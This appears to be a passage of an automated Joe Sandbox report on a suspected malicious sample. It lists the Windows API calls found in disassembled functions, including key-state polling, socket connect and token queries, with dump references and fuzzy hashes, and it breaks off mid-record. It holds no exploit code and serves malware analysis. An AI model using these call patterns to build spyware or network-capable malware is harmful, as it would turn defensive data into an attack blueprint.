                                                                                        • Opcode Fuzzy Hash: 522b3a8837b501e9411f59ba315ac46042a3081b048a5aca1405304867df09ad
                                                                                        • Instruction Fuzzy Hash: 32514B71608244AFD704EF54CC81E6ABBF9BF88314F50482DF95597291DB70E909DB52
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 72c8aa616116f012d3b99d089a3b5838c03926e05b26240c77db26d980a599f0
                                                                                        • Instruction ID: 8d491593f4c4ae4ba77d886145035d32834e6ff3a301cadb4656f8b0358ee6fa
                                                                                        • Opcode Fuzzy Hash: 72c8aa616116f012d3b99d089a3b5838c03926e05b26240c77db26d980a599f0
                                                                                        • Instruction Fuzzy Hash: 7941C37AE02118ABD760DF68CC44FA9BF78EB09360F151125ED69A72E1C770AD01FAD0
                                                                                        APIs
                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F312B4
                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00F312DD
                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F3131C
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F31341
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F31349
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1389676194-0
                                                                                        • Opcode ID: 1bf7f5bebfddf401607ecfccd60000aac3944e8963e17fcf53500962475fd934
                                                                                        • Instruction ID: e670afafa0d55e05ae5ecbea33f8c8b20d6fc7a6c71d67cfbf0905d98df17f08
                                                                                        • Opcode Fuzzy Hash: 1bf7f5bebfddf401607ecfccd60000aac3944e8963e17fcf53500962475fd934
                                                                                        • Instruction Fuzzy Hash: CD411B35A00149DFCF01EF65C991AAEBBF5FF48310B149099E90AAB3A2DB31ED01DB50
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(000000FF), ref: 00EFB64F
                                                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 00EFB66C
                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00EFB691
                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00EFB69F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                        • String ID:
                                                                                        • API String ID: 4210589936-0
                                                                                        • Opcode ID: 451838dec4a5b900abc0e2cc9be6a405c94eaac8984850179a31c815854af151
                                                                                        • Instruction ID: 22aae6ae5ce82cb22a8dea1cf16b21975aad57d81f517674476aa24b06cc4a5b
                                                                                        • Opcode Fuzzy Hash: 451838dec4a5b900abc0e2cc9be6a405c94eaac8984850179a31c815854af151
                                                                                        • Instruction Fuzzy Hash: E3416D31A04119FBDF299F64CC44AE9BBB4FF05365F104359F929A6290CB30AD94EFA1
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00F1B369
                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00F1B413
                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00F1B41B
                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00F1B429
                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00F1B431
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3382505437-0
                                                                                        • Opcode ID: 613f2aa9072f238f07a05158d002b7d9a35c3fc61d8ea46259582eccf3e5c208
                                                                                        • Instruction ID: dd91ded4b0876b299f9695d2b80ace70102206195274814a2dbefa5926ce4e1f
                                                                                        • Opcode Fuzzy Hash: 613f2aa9072f238f07a05158d002b7d9a35c3fc61d8ea46259582eccf3e5c208
                                                                                        • Instruction Fuzzy Hash: 7A31AE7190021DEBDF14CFA8DD4DADE7BB5EB04325F108229F931AA1D1C3B199A4EB91
                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 00F1DBD7
                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F1DBF4
                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F1DC2C
                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F1DC52
                                                                                        • _wcsstr.LIBCMT ref: 00F1DC5C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                        • String ID:
                                                                                        • API String ID: 3902887630-0
                                                                                        • Opcode ID: c78ebd92bdc1610fe68a8efdbc1ac246809fd9de503c86ba082346b4d74cf5f8
                                                                                        • Instruction ID: bc7a8e600438f8bc9c923fc2009b35b4107fd31c999b00d5d1f9acff734b0822
                                                                                        • Opcode Fuzzy Hash: c78ebd92bdc1610fe68a8efdbc1ac246809fd9de503c86ba082346b4d74cf5f8
                                                                                        • Instruction Fuzzy Hash: 24212972604104BBEB159F39DC49EBB7BB8DF45760F104039F909DA191EBA6DC81F6A0
                                                                                        APIs
                                                                                          • Part of subcall function 00EFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EFB35F
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F4DEB0
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F4DED4
                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F4DEEC
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00F4DF14
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00F33A1E,00000000), ref: 00F4DF32
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                        • String ID:
                                                                                        • API String ID: 2294984445-0
                                                                                        • Opcode ID: 6bb54b2bd8e2de0f56065f17ec546077b4047e942bdc9215f7e243c70c10afc0
                                                                                        • Instruction ID: 8adcfcb84fdf1d5b50bef6977c3ee19632dfdc29c7c8e2ae5a9299451dc65281
                                                                                        • Opcode Fuzzy Hash: 6bb54b2bd8e2de0f56065f17ec546077b4047e942bdc9215f7e243c70c10afc0
                                                                                        • Instruction Fuzzy Hash: AD219071A11216AFCB208F78CC44B6A3B94FB15334F150724FD26CB6E0E7709850AB80
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F1BC90
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F1BCC2
                                                                                        • __itow.LIBCMT ref: 00F1BCDA
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F1BD00
                                                                                        • __itow.LIBCMT ref: 00F1BD11
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$__itow
                                                                                        • String ID:
                                                                                        • API String ID: 3379773720-0
                                                                                        • Opcode ID: c05c4c6ab9533a173a1426cd37d354d974908e4369dd55ed21d4ab3bc9948f50
                                                                                        • Instruction ID: a6fa4d7e3256801645848b82432dd7a6319781833284c90c67813461055bacb5
                                                                                        • Opcode Fuzzy Hash: c05c4c6ab9533a173a1426cd37d354d974908e4369dd55ed21d4ab3bc9948f50
                                                                                        • Instruction Fuzzy Hash: A8210836B00208FBDB14AF659C86FDE7BA8AF5D350F001024FA09EB181DB75C985A3E1
                                                                                        APIs
                                                                                          • Part of subcall function 00EE50E6: _wcsncpy.LIBCMT ref: 00EE50FA
                                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,00F260C3), ref: 00F26369
                                                                                        • GetLastError.KERNEL32(?,?,?,00F260C3), ref: 00F26374
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00F260C3), ref: 00F26388
                                                                                        • _wcsrchr.LIBCMT ref: 00F263AA
                                                                                          • Part of subcall function 00F26318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00F260C3), ref: 00F263E0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                        • String ID:
                                                                                        • API String ID: 3633006590-0
                                                                                        • Opcode ID: 7bcc68c4e8f07f922ece46e12375787ea4f61f552ba0821ae0d1d4358f6e8b08
                                                                                        • Instruction ID: 346f9e9e3b3ddd555c8a6cdda9aa7d9202d811cf0f432a498e16e78a7fa4246c
                                                                                        • Opcode Fuzzy Hash: 7bcc68c4e8f07f922ece46e12375787ea4f61f552ba0821ae0d1d4358f6e8b08
                                                                                        • Instruction Fuzzy Hash: DD210831E052294AEB21EB74BC52FEA33ACEF05370F200065F055D32C0EBA4DD80BA64
                                                                                        APIs
                                                                                          • Part of subcall function 00F3A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00F3A84E
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F38BD3
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00F38BE2
                                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00F38BFE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastconnectinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 3701255441-0
                                                                                        • Opcode ID: 193d6fadaeb3411357fb310e86349e0009e5f2b4497add5e1b5c523eeb98beb3
                                                                                        • Instruction ID: d91a33e3999dd43b11fd8aa97d213419d63a967388e3118f066b004ddfc33b69
                                                                                        • Opcode Fuzzy Hash: 193d6fadaeb3411357fb310e86349e0009e5f2b4497add5e1b5c523eeb98beb3
                                                                                        • Instruction Fuzzy Hash: 352193317002189FCB10AF68DD45F7D77E9AF48760F045459FA56A72D2CBB8AC02A761
                                                                                        APIs
                                                                                        • IsWindow.USER32(00000000), ref: 00F38441
                                                                                        • GetForegroundWindow.USER32 ref: 00F38458
                                                                                        • GetDC.USER32(00000000), ref: 00F38494
                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00F384A0
                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00F384DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                        • String ID:
                                                                                        • API String ID: 4156661090-0
                                                                                        • Opcode ID: 2471f24ed86cc157d0ba1eb0da82bd552e4fea9ddb5f4e51f92204459fb25255
                                                                                        • Instruction ID: e949c8373186a49628bdf326b0aa61386b094455cd3ad052bebec01d42947099
                                                                                        • Opcode Fuzzy Hash: 2471f24ed86cc157d0ba1eb0da82bd552e4fea9ddb5f4e51f92204459fb25255
                                                                                        • Instruction Fuzzy Hash: AA21C335B00208AFD700DFA5DC85AAEBBF9EF48351F048479F95A97251CB74AC01EB60
                                                                                        APIs
                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00EFAFE3
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00EFAFF2
                                                                                        • BeginPath.GDI32(?), ref: 00EFB009
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00EFB033
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                        • String ID:
                                                                                        • API String ID: 3225163088-0
                                                                                        • Opcode ID: bfd466000769624dd9960333ac254ba490ee756712d71a75b66d77a9082aa17f
                                                                                        • Instruction ID: 89d53d76da35f0dfb01d02d29f631635604e4475619ddb869433283e74b34733
                                                                                        • Opcode Fuzzy Hash: bfd466000769624dd9960333ac254ba490ee756712d71a75b66d77a9082aa17f
                                                                                        • Instruction Fuzzy Hash: 9F21A1F1A0020DEFDB109F55EC447AA7B68BB123A5F19432AF524E62E0C7B04945EB90
                                                                                        APIs
                                                                                        • __calloc_crt.LIBCMT ref: 00F021A9
                                                                                        • CreateThread.KERNEL32(?,?,00F022DF,00000000,?,?), ref: 00F021ED
                                                                                        • GetLastError.KERNEL32 ref: 00F021F7
                                                                                        • _free.LIBCMT ref: 00F02200
                                                                                        • __dosmaperr.LIBCMT ref: 00F0220B
                                                                                          • Part of subcall function 00F07C0E: __getptd_noexit.LIBCMT ref: 00F07C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                        • String ID:
                                                                                        • API String ID: 2664167353-0
                                                                                        • Opcode ID: f398b69e05949601b85fca2682c20d6e51cb4b7af97665e9afcfecbff70e4ebf
                                                                                        • Instruction ID: 59cd713c772142a142fdb31fa751a515b95e88fd7ae7163989acecd3c3777baf
                                                                                        • Opcode Fuzzy Hash: f398b69e05949601b85fca2682c20d6e51cb4b7af97665e9afcfecbff70e4ebf
                                                                                        • Instruction Fuzzy Hash: 61110433A04346AFEB11BFA5DC46DAB3B98EF04770B100429F928C61D1EB75E811B6B1
                                                                                        APIs
                                                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00F1ABD7
                                                                                        • GetLastError.KERNEL32(?,00F1A69F,?,?,?), ref: 00F1ABE1
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00F1A69F,?,?,?), ref: 00F1ABF0
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00F1A69F,?,?,?), ref: 00F1ABF7
                                                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00F1AC0E
                                                                                        Similarity
                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 842720411-0
                                                                                        • Opcode ID: 8a209800c92490f62b1f80108436e8f83040677eae301b2ce105046239fa1d00
                                                                                        • Instruction ID: ef009115ada1032b8f58c72546e0079b0a3bfbeef2c86ddc6aa2c80af6cc5ed6
                                                                                        • Opcode Fuzzy Hash: 8a209800c92490f62b1f80108436e8f83040677eae301b2ce105046239fa1d00
                                                                                        • Instruction Fuzzy Hash: EE018170B01209BFDB114FA5DC48DAB3BACEF8A3647100429F415C3250D6B1CC80EBA0
                                                                                        APIs
                                                                                        • CLSIDFromProgID.OLE32 ref: 00F19ADC
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000), ref: 00F19AF7
                                                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 00F19B05
                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00F19B15
                                                                                        • CLSIDFromString.OLE32(?,?), ref: 00F19B21
                                                                                        Similarity
                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 3897988419-0
                                                                                        • Opcode ID: 2cd3cad22ba29effcaf774c1a7f9c7166f730c229e0d2df35a3c98e9bf824c6d
                                                                                        • Instruction ID: 3558dd1fbf885435a899d67a9473513d69cfaee4ee04c3d44ba183b171d2c8d8
                                                                                        • Opcode Fuzzy Hash: 2cd3cad22ba29effcaf774c1a7f9c7166f730c229e0d2df35a3c98e9bf824c6d
                                                                                        • Instruction Fuzzy Hash: 33018476B04209BFDB108F64ED58B997AEDEF84391F144028F905D3210D7B0DE40ABE0
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F27A74
                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00F27A82
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F27A8A
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00F27A94
                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F27AD0
                                                                                        Similarity
                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                        • String ID:
                                                                                        • API String ID: 2833360925-0
                                                                                        • Opcode ID: f9f6a3448d9b4dff646dd99e127e1b93a2bef00329c7e2abe0f067431a4860f8
                                                                                        • Instruction ID: f42934c679ddc5f7a944b41656fb4261fa1d6ea976dae071e6a9e969327fe897
                                                                                        • Opcode Fuzzy Hash: f9f6a3448d9b4dff646dd99e127e1b93a2bef00329c7e2abe0f067431a4860f8
                                                                                        • Instruction Fuzzy Hash: 4A016932D0962DEBDF00AFE5EC49ADDBB78FB09721F000046E512B2160DB789650ABA1
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F1AADA
                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F1AAE4
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F1AAF3
                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F1AAFA
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F1AB10
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: d0942122fdafa4242d1c7c5d59061b2745ee17fb2ee521c495672be47f18b94f
                                                                                        • Instruction ID: 964e90abc78b1d62b73ffe67790f69c7b322029b77f66e1ab5707397ee9a4f91
                                                                                        • Opcode Fuzzy Hash: d0942122fdafa4242d1c7c5d59061b2745ee17fb2ee521c495672be47f18b94f
                                                                                        • Instruction Fuzzy Hash: 23F062717052487FEB125FA5FC88EA73BADFF8A768F000029F951C7190CAA19C45EB61
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F1AA79
                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F1AA83
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F1AA92
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F1AA99
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F1AAAF
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: 79ef225271dbb873cfc782e93c0397710a73645004a77f38b251dde676d87e81
                                                                                        • Instruction ID: e48437b7294129cc0b4457ad06185048a452e57fd2a89e82794e1c2aafe9429a
                                                                                        • Opcode Fuzzy Hash: 79ef225271dbb873cfc782e93c0397710a73645004a77f38b251dde676d87e81
                                                                                        • Instruction Fuzzy Hash: A2F04F71701208BFEB115FA5AC89EB73BACFF4A764F000419F951C7190DAA59C41EA61
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00F1EC94
                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F1ECAB
                                                                                        • MessageBeep.USER32(00000000), ref: 00F1ECC3
                                                                                        • KillTimer.USER32(?,0000040A), ref: 00F1ECDF
                                                                                        • EndDialog.USER32(?,00000001), ref: 00F1ECF9
                                                                                        Similarity
                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3741023627-0
                                                                                        • Opcode ID: 277d2a7aee9fe4252afb6c4bd4a74fcf03e524be5daa791f547215c0750856e2
                                                                                        • Instruction ID: 2c96cf70a8a7c5d0e97aa7f2c9516b4c82b4fde9f1668b363b52edc02a9c8578
